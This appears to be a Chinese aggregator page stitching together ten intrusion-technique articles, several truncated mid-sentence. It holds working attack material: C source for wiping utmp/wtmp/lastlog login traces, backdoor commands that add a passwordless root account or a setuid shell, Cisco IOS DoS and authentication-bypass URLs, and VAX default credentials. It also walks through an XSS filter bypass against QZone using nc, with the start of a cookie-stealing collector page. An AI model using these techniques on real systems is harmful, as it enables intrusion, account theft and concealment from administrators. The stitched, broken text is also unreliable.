“小神仙”通过精心收集,向本站投稿了10篇跨站入侵技术详解,下面是小编为大家准备的跨站入侵技术详解,欢迎阅读借鉴。
- 目录
篇1:跨站入侵技术详解
总体介绍
简单介绍什么是XSS攻击
如何寻找XSS漏洞
对于XSS攻击的总体思路
来自内部的攻击:
如何寻找内部的XSS漏洞
如何构造攻击
如何利用
结何实例攻击,如DVBBS&BBSXP
来自外部的攻击
如何构造XSS攻击
如何欺骗管理员打开
XSS与其它技术的结何
与mssql injection的结合
QQ跨站的结何
国内大型统计网站的跨站漏洞
社会工程学
正文:
XSS总体介绍
什么是XSS攻击
XSS又叫CSS (Cross Site Script) ,跨站脚本攻击,
跨站入侵技术详解
,
它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意用户的特殊目的。XSS属于被动式的攻击,因为其被动且不好利用,所以许多人常呼略其危害性。而本文主要讲的是利用XSS得到目标服务器的shell。技术虽然是老技术,但是其思路希望对大家有帮助。
篇2:热门技术探讨之跨站式入侵(图)
最近朋友们老是弄些跨站,一会看这个站被跨站 那个站又被跨站,我看也无聊 顺便弄一些玩玩,到百度上随便搜索了几个站的地址 结果一 测试 全都可以弄,这不得不让人很担心啊,以下是几个站的截图和地址TOM网search.tom.com/search.php?f=8&cl=3&f=8&e
最近朋友们老是弄些跨站,一会看这个站被跨站 那个站又被跨站,我看也无聊 顺便弄一些玩玩,到百度上随便搜索了几个站的地址 结果一 测试 全都可以弄,这不得不让人很担心啊。以下是几个站的截图和地址
TOM网
search.tom.com/search.php?f=8&cl=3&f=8&edt=0&word=太子King&tomsearch=webpage&submit=TOM搜索
500)this.width=500“ title=”点击这里用新窗口浏览图片“ />
163网
cha.so.163.com/so_err.php?q=太子King&ad=&Language=lang_zh-CN&bd=2
500)this.width=500” title=“点击这里用新窗口浏览图片” />
百度网
zhidao.baidu.com/q?word=太子King<script.>alert(“By
篇3: 入侵技术详解:cisco路由入侵艺术 (1)
奔流不息的网络里,Web绽放着绚丽的色彩、电子邮件呼哧的穿梭网际、语音电话、网络会议、文件传输,各种数据交织错落,形成辉煌的数字世界,
入侵技术详解:cisco路由入侵艺术 (1)
。在喧闹的数字世界底层,存在一种精致的次序,这种次序决定着数据的选路、异构介质衔接、协议的交互等功能。而这一次序的缔造者正是布满整个网络的路由器。于是,路由器成了数据通信的交通亭,也成为了众多黑帽(Blackhat)争夺的目标之一。
Cisco路由器占据这网络世界的绝对位置,于是安全焦点效应激发了路由入侵与防御而产生的精美艺术。下面我将由浅入深的方式讲述Cisco入侵的手段以及防御策略。
【路由器感冒】
路由器从本身的IOS来说,并不是一个健壮的体系,因而它偶尔也会让自己感冒发烧。系统感冒发烧起来,抵抗力自然就降低不少。
*IOS自身欺骗
Cisco路由器是用IOS系统来实现路由的细节功能,因此它是路由系统的灵魂。Show命令的在线系统方式却为我们打开一个偷窥之门。
众所周知,Cisco路由器中,一般用户只能查看路由器的很少信息。而能进入特权模式的用户才有资格查看全部信息和修改路由。一般模式下,show的在线帮助系统不会列表所有可用的命令,虽然75个show的扩展参数只能用于特权模式下(enable),实际上只有13个受到限制。这意味着一般用户(非特权用户)可以查看访问列表或其他路由安全相关信息。
重要安全相关的ACL信息可以被登录路由的非特权用户查看,诸如:
#show access-lists
#show ip prot
#show ip ospf dat
#sh ip eigrp top
等命令可以在非特权模式下泄露网络敏感信息。通过这些命令,我们能得出路由器配置的大致情况,这对采取进一步的入侵起到辅助作用。不过由于这种方式需要用户已经有一个登录帐户,因此得到这样的信息有一定难度。
*WCCP暗道
Cisco在IOS 11.2版本中引入WCCP(Web Cache Control Protocol),为Cisco缓存引擎提供协议通信。Cisco缓存引擎为www提供透明缓存服务。缓存引擎用WCCP来和其他cisco路由器通信。路由器把HTTP数据发送到缓存引擎主机中。
虽然这种方式默认是关闭的。假如使能(enable)的话,那么WCCP本身是没有认证机制的。路由器将会把每一个发送合法缓存引擎类型的Hello包的主机认为缓存引擎,于是把HTTP数据缓存到那台主机。这意味着恶意用户可以通过这种方式获取信息。
通过这种方式,攻击者可以截获站点认证信息,包括站点密码;替代实际WEB内容为自己设计的陷阱;通过路由彻底破坏Web提供的服务。这种方式,可以完全规避登录烦琐的攻击方法,对Web提供全面而且致命的打击。
我们既可关闭WCCP的启用机制,也可通过ACL阻止WCCP发送HTTP流量给不信任主机来防止这样的恶劣情况发生。
*HTTP服务的困惑
Cisco在IOS版本加入了远程管理路由的Web特性,这对于新羽(newbie)的管理员来,无疑是值得高兴的事情。但引入方便的同时,隐患也随之进入。
1.基于拒绝式服务攻击的HTTP的漏洞
Cisco路由启用(enable)远程WEB管理,很容易遭受DoS。这种DoS能导致路由器停止对网络请求的响应。这是功能是Cisco路由的内嵌功能。但启用这个特性,通过构造一个简单的Http请求就会造成DoS攻击:
/%%
这种请求导致路由停止响应,甚至引起路由器执行硬重置(hard reset)。
2.基于HTTP服务器查询的漏洞
Cisco 安全建议小组在10月30日公布了这个漏洞。IOS 11.0引入通过Web方式管理路由。”?”是HTML规范中定义的CGI参数的分界符。它也被IOS命令行接口解释成请求帮助。在IOS 12.0中,当问号邻接于”/”,URL解释器就不能正确解释其含义。当一个包括”?/”的URL对路由器HTTP服务器进行请求,并且提供一个有效的启用口令,则路由器进入死循环。因而引起路由崩溃并重起。
如果http起用,浏览
route_ip_addr/anytest?/
并且提供特权口令,则可以导致DoS攻击,导致路由停机或者重启,
除了让路由死亡之外,Http额外提供了一种可怕权限提升的漏洞,如下所论。
3.Cisco IOS 认证漏洞
当HTTP服务器启用并且使用本地用户认证方式。在某些条件,可以绕过认证并执行设备上的任何命令。用户可以对设备完全的控制。所有命令都将以最高特权执行(level 15)。
使用username 和password的路由设备帐户认证方式,构造如下URL:
router_ip_addr/level/xx/exec/….
(注:xx代表16至99之间的84种不同的组合攻击,因为路由器硬件类型众多,而IOS版本也存在不同,因此针对不同的路由器类型,攻击组合数字不同。)
通过这种方式,攻击者可以完全控制路由并可以改变路由表配置。这种可怕的事实让网管也感到惊悸。这种完整的控制方式将是网站数据通信枢纽的致命一击。
虽然Http漏洞带来如此之多的漏洞,但这种漏洞最主要原因是因为启用http服务器管理路由的缘故,由于这种管理是种命令行方式的替代物,因此对于熟练的网管来说,没有必要启动这种危害性很大的服务。
#no ip http server 的路由配置也成为时髦的安全配置语句。
【在SNMP中行走】
谈到Cisco路由的安全性,我们就必须涉及到SNMP这个看似简单,实际扮演着重要角色的协议,正因为它的存在,路由器的入侵变的丰富有趣多了。
*SNMP基础简介:
每个SNMP启用的路由设备都包含一个叫做管理信息模块(MIB),这是一种包含简单等级的数据目录结构,在这种树结构中包含设备各种信息。SNMP基本的命令GET,可以检索MIB的信息,而SET命令则可设置MIB变量。一种用于监控和管理CISCO路由的的软件工具是MRTG,至于如何配置其用于Cisco设备的监控可以参阅LOG的《怎样在Windows NT/2K下安装MRTG》一文(www.2hackers.org/cgi-bin/2hb/topic.cgi?forum=7&topic=212)。
在路由器中配置SNMP的方法如下:
(conf)#snmp-server community readonly RO
(conf)#snmp-server community readwrite RW
SNMP协议通过社区(community)字串的概念赋予对设备MIB对象访问的权限。上例中,设置了只读访问的社区字串readonly和可进行读写操作的readwrite社区字串。而大部分管理员喜欢使用public和private设置只读字串和读写字串,疏不知,这样轻易的结果将给网络带来巨大的波动。我们可以在【触及RouterKit】部分清楚认识到这种危害。
通过SNMP我们可以方便管理和监控Cisco的设备(参阅Log文章介绍),同时也给攻击者带来可乘之机。
*Cisco IOS软件SNMP读写ILMI社区字串漏洞
ILMI是一个独立的工业标准,用于配置ATM接口。MIB是一个树形结构,包括操作(只读)数据以及配置(读写)选项。在有漏洞的设备上,通过在SNMP请求中指定一个ILMI社团字符串,可以访问整个树形管理结构中三个特定部分的对象:MIB-II系统组,LAN-EMULATION-CLIENT MIB以及PNNI(Private Network-to-Network Interface)MIB。每一部分的子集对象都可以使用相同的“ILMI”社团字符串修改。
MIB-II系统组包括设备本身的基本信息。能被修改对象的数目虽然是有限的。例如包括:
system.sysContact.
system.sysLocation.
system.sysName.
Cisco IOS软件版本11.x和12.0允许使用一个非文档的ILMI社区字串未经授权就查看和修改某些SNMP对象。其中就包括诸如上面所说的”sysContact“,”sysLocation“,和”sysName“对象,虽然修改它们不会影响设备的正常操作,但如果意外修改可能会产生混乱。剩下的对象包含于LAN-EMULATION-CLIENT和PNNI MIBs,修改这些对象可以影响ATM配置。如果没有防止未授权使用ILMI社团字符串,一台有漏洞的路由器可能会遭受DoS攻击。
如果SNMP请求可以被有漏洞的设备接收,那么没有适当授权,就可以访问某些MIB对象,违背了保密性。没有授权就可以修改可读MIB对象的子集,破坏了完整性。而更具有危害性的方法是向SNMP端口发送大量的读和写请求。有漏洞的设备,如果没有防范接收SNMP包的措施,就会遭受DoS攻击,导致路由重载。
篇4:网络入侵详解 第
2.1) DoS攻击 2.1.1) Syn-flooding 向目标发起大量TCP连接请求,但不按TCP协议规定完成正常的3次握手,导致目标系统等待并耗费其网络资源,从而导致其网络服务不可用,
网络入侵详解 第二篇
,
2.1.2) Ping-flooding 向目标系统发大量ping包,i.e.ICMP_ECHO包,使目标的网络接口应接
篇5:网络入侵详解(网络入侵实例)
入侵一个系统有很多步骤,阶段性很强的工作,其最终的目标是获得超级用户权限对目标系统的绝对控制,
网络入侵详解(网络入侵实例)
,
从对该系统一无所知开始,我们利用其提供的各种网络服务收集关于它的信息,这些信息暴露出系统的安全脆弱性或潜在入口;然后我们利用这些网络服务固有的或
篇6: 入侵的技术
1 、UPLOAD
侵入成功后,拿到root权限了,这个东东可以把他的服务器的访问权限改了,让任何人都可以上传文件 !
root 状 态 下, 运 行 Install 后,
upload 将 允 许 普 通 用 户 上 载 文 件 至 任 何 目 录 下,
入侵的实用技术大全
。
# chmod 755 install
#./install
$ more install
#! /bin/csh -f
cc upload.c
cp a.out upload
chown root upload
chmod 755 upload
chmod u+s upload
$ more upload.c
#include
main
{
char filename[48];
printf( ”This program will upload up.txt ASCII file to specified filen“ );
printf( ”XXX Copyright Reservedn“ );
printf( ”Where to upload (include path and filename)? “ );
gets( filename );
upload( filename );
}
int upload( filename )
char *filename;
{
FILE *fp,*outp;
char c;
fp=fopen( ”up.txt“,”r“ );
utp=fopen( filename,”w“ );
if( fp== NULL ) {
printf( ”file not exist.“ );
return 0;
}
for( ;; ) {
c= fgetc( fp );
if feof( fp ) break;
printf( ”%c“,c );
fputc( c, outp );
}
fclose( fp );
fclose( outp );
return 1;
}
2、破坏现场
进入系统后,出来以前怎么破坏现场?抹掉自己的脚印?
编辑 /etc/utmp, /usr/adm/wtmp and /usr/adm/lastlog.
请使用专门的编辑器
例子:
#include
#include
#include
#include
#include
#include
#include
#include
#define WTMP_NAME ”/usr/adm/wtmp“
#define UTMP_NAME ”/etc/utmp“
#define LASTLOG_NAME ”/usr/adm/lastlog“
int f;
void kill_utmp(who)
char *who;
{
struct utmp utmp_ent;
if ((f=open(UTMP_NAME,O_RDWR))>=0) {
while(read (f, &utmp_ent, sizeof (utmp_ent))>0 )
if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
bzero((char *)&utmp_ent,sizeof( utmp_ent ));
lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);
write (f, &utmp_ent, sizeof (utmp_ent));
}
close(f);
}
}
void kill_wtmp(who)
char *who;
{
struct utmp utmp_ent;
long pos;
pos = 1L;
if ((f=open(WTMP_NAME,O_RDWR))>=0) {
while(pos != -1L) {
lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND);
if (read (f, &utmp_ent, sizeof (struct utmp))<0) {
pos = -1L;
} else {
if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
bzero((char *)&utmp_ent,sizeof(struct utmp ));
lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND);
write (f, &utmp_ent, sizeof (utmp_ent));
pos = -1L;
} else pos += 1L;
}
}
close(f);
}
}
void kill_lastlog(who)
char *who;
{
struct passwd *pwd;
struct lastlog newll;
if ((pwd=getpwnam(who))!=NULL) {
if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) {
lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0);
bzero((char *)&newll,sizeof( newll ));
write(f, (char *)&newll, sizeof( newll ));
close(f);
}
} else printf(”%s: ?n“,who);
}
main(argc,argv)
int argc;
char *argv[];
{
if (argc==2) {
kill_lastlog(argv[1]);
kill_wtmp(argv[1]);
kill_utmp(argv[1]);
printf(”Zap2!n“);
} else
printf(”Error.n“);
}
3、突破SHELL
许多攻击系统的方法都需要攻击者首先有一个命令行式的Shell,如 /bin/csh ,
但有些系统提供给用户的却是菜单式的定制Shell,如 pink 。所以如果你想攻击这个系统的话,首先必须要冲破这个定制shell。
我们可以利用 vi (UNIX中标准的编辑器) 的一些命令来达到这个目的。具体过程如下:
(1).在定制Shell中选择编辑文件,这时系统启动 vi。
(2).在 vi 中,输入以下命令序列:(注意:输入的命令包括最前面的 ':' )
:set shell=/bin/csh
:shell
3.这时,就像在DOS程序的File菜单中选择Dos Shell菜单项一样,系统启动一个Shell,而这个Shell刚刚被我们设定成 /bin/csh,因此我们就得到了一个命令行式的Unix Shell。
4、后门
进入一个系统以后随手留下一个后门确实是很好的习惯:) 这里介绍几种简单的后门设置方法:
(1). setuid
#cp /bin/sh /tmp/.backdoor
#chmod u+s /tmp/.backdoor
加上 suid 位到shell 上,最为简单方便.
(2). echo ”wyj::0:0::/:/bin/csh“ >>/etc/passwd
即给系统增加一个 id 为 0(root)的帐号,无口令.
(3). echo ”+ wyj“>>/.rhosts
即本地的名为wyj的用户可以直接 rlogin target 无须口令此时的wyj就相当于口令,不知道的人是不能进去的.前提是目标的port 512or513or514 opening.
篇7:网上入侵对方个人电脑详解
这道快餐是专门为从来没有通过网络进入过对方计算机的网络新手们准备的,主要使用的软件就是著名的国产木马冰河2.2,所以,如果你已经使用过冰河2.2,就不必跟着我们往下走了,
网上入侵对方个人电脑详解
,
其他有兴趣的网络新手们,Let's go! 第一步 下载必备的工具软件。1号软件就是端
篇8:QZone跨站入侵漏洞分析
我们来了解一下“Q-ZONE”的这一跨站漏洞吧,
Q-Zone跨站漏洞的分析
1、Q-Zone对用户输入的过滤
进入Q-Zone后,依次点击“设置→空间设置→QQ空间名称”,在这里将可以修改空间的显示名称。如果我们写入一段可执行的脚本代码,只要过滤不严格的话,同样会被保存在首页中,通过调用执行代码,达到攻击浏览者的目的。下面我们先测试一下这个输入框中能否写入跨站脚本:
在“输入空间名称”输入框中输入上面的代码“”时,发现在输入框中限制了输入字符的长度,总共只能输入24个字符。而且当我们输入许可长度的代码,点击提交后会弹出“请不要在输入中包含”等字符”的对话框。看来Q-Zone对用户的输入进行了过滤。
2、查看Q-Zone的输入过滤方式
在Q-Zone页面中点击“查看→源文件”,在代码段开始处,可以看见如下代码段:
if (!checkFormValue(form1)) return false;
len = StrLenOfAscii(form1.spacename.value)/2;
if (len>12) {
有一点点ASP编程基础的用户,相信都可以看懂这段代码吧?在代码中通过“StrLenOfAscii”函数,获得了用户输入数据ASCⅡ码的长度,除2后赋值给len变量。后面的代码检测len变量长度大于12的话,就提示输入名称太长。最重要的是前面的一句:“if (!checkFormValue(form1)) return false”,其中“checkFormValue()”函数很明显可以推断是用来检测输入数据中是否包含特殊字符的。当检测到数据中包含被过滤的字符时,就弹出了前面所说的对话框。
通过分析,我们可以肯定Q-Zone是在客户端对用户输入数据进行过滤的。
Q-Zone跨站漏洞的利用
即然Q-Zone是在客户端对用户输入数据进行过滤的,那么就给我们留下了可利用的机会。我们可以绕过客户端的限制,直接修改输入数据进行提交。但是Q-Zone对用户提交数据还进行了另外一个限制,就是不允许外站提交,在这里我们保存的HTML文件也无法正常提交数据。因此,我们必须另外想一个办法,修改提交数据。
1、截获提交数据
我们先运行一个叫作WSockExpert的软件,运行WSockExpert后点击工具栏上的“打开”按钮,显示当前的进程列表。如果是用QQ的面板打开Q-Zone的,那么在进程列表中选择“QQ.exe→**的家”;如果是用IE打开Q-Zone的,可以在IE进程中找到相应的进程,确定后点击“Open”按钮开始监视与网站服务器交换的数据。
返回到Q-Zone网页中,在“空间名称”处输入任意可提交的字符如“1234567890”,然后点击“提交”,回到WSockExpert中,点中间列表框中的第3行“send”附近的数据栏,可以看到提交的数据内容:
“Content-Length: 20
Cookie: pvid=1575119174; portalentryurl=vnet.qq.com/hn/; zzpaneluin=41346583; zzpanelkey=753923CF61AB165D613966B82F8E7F6B2D9E5A681CE7507E9A677086A89BC6DD; clientver=1305; skey=; uin=g0
spacename=1234567890”
“Cookie”是Cookie内容,包含了用户验证的东西;而“spacename=1234567890”就是我们提交的空间名称数据了;前面的“Content-Length: 20”是提交的这段数据的长度,
在数据中,还可以看到“Referer: q-zone.qq.com/cgi-bin/user/cgi_show_spacename”,这是我们要提交的服务端网页地址。
2、修改提交数据
将下面窗口中的提交数据内容全部复制后,保存为一个1.TXT文件,将代码中的“spacename=1234567890”改为:“spacename=”,“Content-Length: 20”改为“Content-Length: 40”
现在我们只要将这些数据提交到服务器上,就可以绕过客户端对数据的过滤了,这就要用到另外一个叫作NC的工具了。
将上面保存的“1.txt”复制到与“nc.exe”同一个文件夹中,打开Windows系统中的命令提示符窗口,在命令行下进入NC.exe所在的文件夹,输入“nc -vv q-zone.qq.com 80<1.txt”,命令执行后,就会向远程服务器提交我们修改过的数据了。
提示:我们可以将“Test”换成任意中文,但是需要先转换为IE编码,例如“测试”的IE编码为“%B2%E2%CA%D4”,具体的转换过程这里就不用多说了。
3、检测代码执行结果
打开我们的Q-Zone,此时会自动弹出一个提示窗口。说明我们已经在远程的网页中成功的插入了“”这条代码!同时在修改空间名称的页面中,可以看到已提交修改的原来被限制了的空间名称。
跨站漏洞应用实例——盗取用户Cookie
上面进行的仅仅是一个简单的测试,如果攻击者在Q-Zone中写出危险的代码,例如盗取浏览网页者的Cookie内容的代码时,就很有可能获得Cookie中的各种论坛或网站的帐号及密码。下面简单的说一说这种利用方式:
1、上传Cookie收集网页
申请一个网站空间,上传一内容如下的ASP文件——info.asp,这个网页主要用来收集后面的Cookie内容。
<%
testfile=Server.MapPath(“cookies.txt”)
msg=Request(“msg”)
set fs=server.CreateObject(“scripting.filesystemobject”)
set thisfile=fs.OpenTextFile(testfile,8,True,0)
thisfile.WriteLine(“”&msg& “”)
篇9:入侵间谍卫星系统技术
1.VAX: VAX的全称是Virtual Address Extension,VAX计算机是由于硬件条件的限制,被设计
来储存地址的,使它能够很简便的操作一些很大的适合于储存的程序。 VAX计算机系统是
DES(Digital Equipment Corporation)公司设计的。普遍的VAX系列的包括一些桌上型VAX系统使用
的是大型机上的处理器。这些系列的计算机变得越来越小,如MicroVAX计算机逐渐升级,像一些中
等大小的11/7XX系列到最新的6000系列的。这些计算机系统普遍的使用一种开放型的系统VMS。
VMS: VMS全称Virtual Memory System.VMS操作系统非常类似于其他的开放型的系统。DEC公司
利用这种系统将他们公司的计算机应用于商业和工程行业,在这之前,VMS系统仅仅被应用于单机系
统中。VMS公司构思了一条发展之路,将他们的VMS系统融入一些基本的计算机管理应用于个人家庭
用户和一些其它的计算机系统。
DCL: DCL全称Digital Command Language.它使VMS系统的基础语言。你们那些人中有IBM系统
,你能想象DCL程序类似于批处理文件。你能够用它做很多事情。(比PC-DOS或者MS-DOS更多)但是
它的工作都是使用一些基本而又相同的方法。有一个差别就是你在DCL程序里想要显示任何文件之前
必须在提示符前面输入“$”符号。DCL程序通常调用COM为扩展名的文件时是很快捷的。当你没有执
行一个COM或DCL程序的文件时,几乎在DCL处理器里总是显示某些文件。
2.
当你进入一个VAX系统的时候,你将会看到一些类似于下面的界面:
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
WELCOME
TO THE
AT&T MICROVAX II SYSTEM
Username: (username here)
Password: (password here... does not echo)
$ (<-- this is your prompt)
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
GETTING IN A VAX BY ERROR:
=========================
你将知道如果你有一个VAX显示系统,如果你得到用户名和密码的提示符,那么下面将会帮助你
猜测密码。
GETTING IN A VAX BY ERROR:
=========================
我在这里将只告诉你一件事情。VMS 4.X和特别的VMS4.4系统是金山,宝库。我现在不是进入
到这个系统内部,因为它有很多的解释不适合于我们攻击的范围。你能够在ARPANET和USENET中发现
很多这样的讨论。你还能从COMPUSERVE信息服务中获得这方面的信息,比特的信息交换中,DES公司
的VAX的BBS中。在VMS5.1系统中存在一个很大的漏洞,但是这个漏洞还不是很严重。如果我发送足
够的请求,我将能够用另外的信息覆盖这条信息。
利用缺省设置进入VAX计算机:
当安装这些VAX系统的时候,系统存在几个缺省的账号可以进入。这些账号的密码在系统与系
统之间是不会改变的。这个系统的管理员应该删除这些账号或者改变密码,但是这些缺省账号在很
长的时间内是不会被人所知的。下面我将列出这些缺省的账号:
USERNAME PASSWORD
-------- --------
DECNET DECNET
* SYSTEST UETP
SYSTEST
SYSTEM SYSTEM
DEFAULT DEFAULT
* FIELD FIELD
OPERATIONS OPERATIONS
* SUPPORT SUPPORT
DEC
SYSTEST_CLIG CLIG
SYSTEST
TEST
在我列出了一些密码的地方,我发现了这些用户名都有很多缺省得密码。在这些旁边有星号的
缺省账号都是一些非常强壮的账号。
VAX VMS 命令:
当你得到“$”符号的时候,你将能够显示出一百多个命令。我将介绍几个比较常用的:
@ 执行这个程序。当你想要运行DCL BATCH或*.COM文件,你必须在这些文件前面输入@。
EX:@LOGIN.COM;3
ACCOUNTING - 这是一个运行账号的程序。 如果你退出一个系统的时候,你能够发现屏幕上
显示出你从进入这个系统到退出这个系统所用的时间,在这段时间中,这个账号是在被使用当中的
。如果你账号资料忘记的话,你可以在系统管理员在系统内的时候输入这个命令来获取你的资料。
CREATE -显示任何文件。 如果你在你电脑内的PASCAL编译器中编写了一个程序,你可以上传
这个文件到VAX计算机内用这个CREATE命令执行。
EX:CREATE program.pas;1
CREATE/DIR - 这将会为你建立一个空目录。 我将说明一下怎样在一分钟内去得到一个VAX
系统。看看SET命令。
EX:CREATE/DIR NameOfDir
DELETE - 被用来删除文件或者清除空目录。 删除一个文件,显示出“DEL FILENAME.EXT;X”
删除一个空目录,首先删除目录内的所有文件,“DEL/LOG *.*;*”下一步,你可以设
置一个保护:“SET PROTECTION=OVNER:D DIRNAME.DIR” 下一步,删除这个目录:“DEL
DIRNAME.DIR”
EX:DEL DAVID.TXT;4
DIRECTORY - 显示你文件所存在的目录。增加“/BRIEF”命令将会给列出一个短的列表,增加“
/FULL”将会给你一个整屏的列表包括每个文件的安全信息。你可以使用DIR命令和通配符来缩短文
件的长度。“*”号能表示任何长度的文件。“%”能够表示任何一个字母。
EDIT -这个命令为是编写者设计的。有很多VAX系统都是使用类似于MS-DOS/PC-DOS命令行的
编写器。无论如何,很多VAX计算机系统都是使用EDT/EVE编辑器来进行编辑的。你能够用这个编辑
器很快的做很多事情。但是仅仅使用你的终端来控制它是很困难的。VT-100运行的速度是非常慢的
。如果你使用EDT/EVE编辑器进行编辑的时候,你可以试着用VT-220终端系统来登陆。
HELP - 这个命令是HELP程序。
LIBRARY -被用来存档用的。 如果你是个新手的话,你可以不使用这个命令。我现在提起它
是因为我将把它打印出来和更多的人就VAX系统左一个更深层次的讨论。
LOGOUT - 退出系统。
MAIL - 加载MAIL程序。 被用来发送MAIL给其他用户,在VAX连上INTERNET的时候,也可
以用来给网络上发送EMAIL。同时,它还能够发送数据给计算机。
$PASSWORD - 修改密码。
EX:$PASSWORD MYNEWPASS
PHONE -这个命令是被用来和其他用户对话的。这个命令是比其他命令都要优越的。一旦PHONE
命令被执行后,你的“$”提示符将可以被“%”提示符。如果你想要对某个人发送信息的话,就先显
示你的用户名。如果你在不同的节点给某人发送信息,就显示出你的节点名,两个冒号,和他的用
户名。你花费很多时间才会发现这个漏洞。(特别是学校的电脑。)但是改变与网络通讯的MAIL和
PHONE命令。
EX: PHONE
% node13::dlight
PHOTO -记录会议。
RUN -运行可执行文件。
SET -这个有很多用法。
SHOW -这个也包括很多,但是没有SET的用法多。我现在列出SHOW命令的使用方法。
EX:SHOW USERS DAV
CLUSTER -VAX串
DEFAULT -目录路径和驱动程序。
DEVICES -系统驱动程序。
INTRUSION -系统账号被破解。
MEMORY -资源内存
NETWORK -网络和VAX内的特定区域,
PROCESS -程序名显示个人标识。
PROTECTION -保护文件。
QUOTA -显示你账号内的磁盘空间。
SYSTEM -各种各样系统的信息。
DAY -日期。
TIME -时间。
USERS -系统的所有用户。
TYPE -显示发送到终端的文件内容。
EX:TYPE DAVID.TXT;3
SET命令:
SET命令是用途很广的命令。它在VMS的5级DCL程序中是万能的命令。
VT:SET FILE/PROTECTION:
我建议应该更多更频繁的使用SET命令有关的保护选项。那些保护命令,如我们熟悉的SOGW或UIC
保护命令,都能够放在任何可以执行或者写入的文件或目录。设置这些保护也包括能够在VAX系统内
读,写,执行或者删除你的文件或目录的不同用户。这个文件也保护那些被用来设置这个选项的。
有一个例子是:
SET FILE/PROTECTION=OWNER:E david.exe;4
如果你在DCL程序中显示这个命令是为了调用DAVID.EXE;4这个程序的话,那么文件的属主将做不
了对这个文件除了执行命令外的任何其他命令。无论如何,下一个例子如下:
SET FILE/PROTECTION=OWNER:RWED david.exe;4
你将能够按“R”读,“W”写,“E”执行和“D”删除键来执行程序。类似的命令也可以应用
于目录。只用把上面的文件名替换成目录名就可以了。当正在创建一个目录时,SET命令可以设置成
你不能删除它。前面讲了这么多,因此你应该总结一个公式:“SET PROTECTION OWNER:D
DIRNAME.DIR;1”和“DEL dirname.dir;1”去删除这个目录。
其他的属主,UIC文件保护下面的一些命令。
WORLD -系统内的任何拥护。
GROUP -你所在组当中的所有用户。
OWNER -仅仅你的账号或者匹配的UIC。
SYSTEM -任何一个有SYSPRV的权限或者有8进制UIC的组。
SET TERMINAL:
这是一个我们进入VAX系统非常重要的命令。如果你有一个VT100终端软件。那么你可以用它:
SET TERMINAL/DEVICE_TYPE=VT100
这个附加的终端是可能被设置的,例如:
SET TERMINAL/WIDTH=80 -设置宽度为80。
SET TERMINAL/ADVANCED_VIDEO =设置124X24行。
SET TERMINAL/ANSI_CRT =ANSI设置出口序列。
SET TERMINAL/AUTOBAUD =可能获得更高的比特率。
SET TERMINAL/BROADCAST =使这些信息能够用SEND,MAIL&PHONE命令来发送。
SET TERMINAL/DEVICE_TYPE=VT220 -设置终端由VT220来控制。
SET TERMINAL/ECHO =使得ECHO命令能够从DCL命令行启动。
SET TERMINAL/FULLDUP =使得双方都能满。
SET TERMINAL/HANGUP =如果终端没信息返回的时候账号自动被注销。
SET TERMINAL/INQUIRE -显示终端的驱动程序。
SET TERMINAL/PAGE=43 -设置43行的长度。
SET TERMINAL/TYPE_AHEAD -设置显示头部的功能。
SET TERMINAL/UNKNOWN -被用来显示ASCII的设备。
SET TERMINAL/WRAP =被用来设置特征的保护。
所有上面的用“=”表示的项目比用“-”表示的设置更容易被改变。在前面的设置中是没有一个
设置目录的。
EX:SET TERMINAL/NOECHO
设置默认值(或挂靠VAX系统周围的)
删除VAX周围的DCL,目录的里面和外面,我需要告诉你设置默认值的命令。它有点像UNIX和
MS-DOS/PC-DOS内的CD命令,除了格式与CD命令不同。这个格式是“SET DEFAULT[.SUBDIR]”去进入
子目录,“SET DEFAULT[-]”进入父目录。我将解释一下改变磁盘的使用方法。如果问到,保留吗
烦之外的一些东西,首先,我将在下面显示出一个例子,那时候把这个例子解释给其他人看是件很
没有头脑的事情。
$ DIR (step 1)
PROGRAM.EXE;2 PROGRAM.EXE;1
$ CREATE/DIR example (step 2)
$ DIR (step 3)
EXAMPLE.DIR;1 PROGRAM.EXE;2 PROGRAM.EXE;1
$ SET DEFAULT [.example] (step 4)
$ DIR (step 5)
no files, animals, vegetables, nor minerals error
$ SET DEF [-] (step 6)
$ COPY PROGRAM.EXE;2 [.example] (step 7)
$ SET DEF [.example] (step 8)
$ DIR (step 9)
PROGRAM.EXE;2
$
这些是我做的:
STEP 1: 我试着看这个目录的内容。我发现我在这个目录中有一个第1,2版的PROGRAM.EXE程
序。
STEP 2:我创建了“EXAMPLE.”这个目录,这个目录看上去是不会被人注意的。
STEP 3: 我又一次查看了这个目录,发现这个目录里多了一个目录“EXAMPLE.DIR;1.”。这是一
个刚刚建立的目录,扩展名是“DIR”,所以它是一个目录。
STEP 4: 我用SET DEFAULT命令改变了目录。你必须使用这种格式去进入子目录。
STEP 5: 我又一次查看了这个目录,这次我的目录里什么资源都没有。如果你对一个空目录输
入DIR的时候将会出现一个错误。
STEP 6:这个命令是用来进入到上一层父目录的。还记得父目录包含的 “EXAMPLE.DIR;1,”目录
吗?这个DEFAULT选项可以被缩写成DEF。
STEP 7:在这里我将举例说明怎样来移动程序。我刚才拷贝了一个PROGRAM.EXE;2的程序到
EXAMPLE目录内了。
STEP 8:请看第三步
STEP 9:我又一次输入了DIR命令查看我的EXAMPLE.DIR;1内的内容了。发现PROGRAM.EXE;2已经在
我的这个目录内了。
如果你现在还不懂基本的VAX命令,那你就下去吧!
有时候你会进入一个大目录,这里有很多很好的东西能够帮助你不至于犯下一个而浪费了很多时
间。
ADA ADA编辑器资源编码文件
BAS BASIC编辑器资源编码文件
B32 BLISS-32编辑器资源编码文件
C C编辑器资源编码文件
COB COBAL编辑器资源编码文件
FOR FORTRAN编辑器资源编码文件
MAR MACRO编辑器资源编码文件
PLI PL/I编辑器资源编码文件
CLD DCL命令描述文件
COM DCL批处理或者命令程序文件
DAT 日期文件
DIS 分类文件
DIR 目录文件
EDT EDT编辑程序的命令文件
EXE 可执行程序
HLP 文本帮助库
JOU EDT编辑日志文件
LIS 系统列表文件
LOG 批处理输出文件
MAI MAIL信息文件
MEM DSR输出文件
OBJ 对象连接文件
RNO DSR资源文件
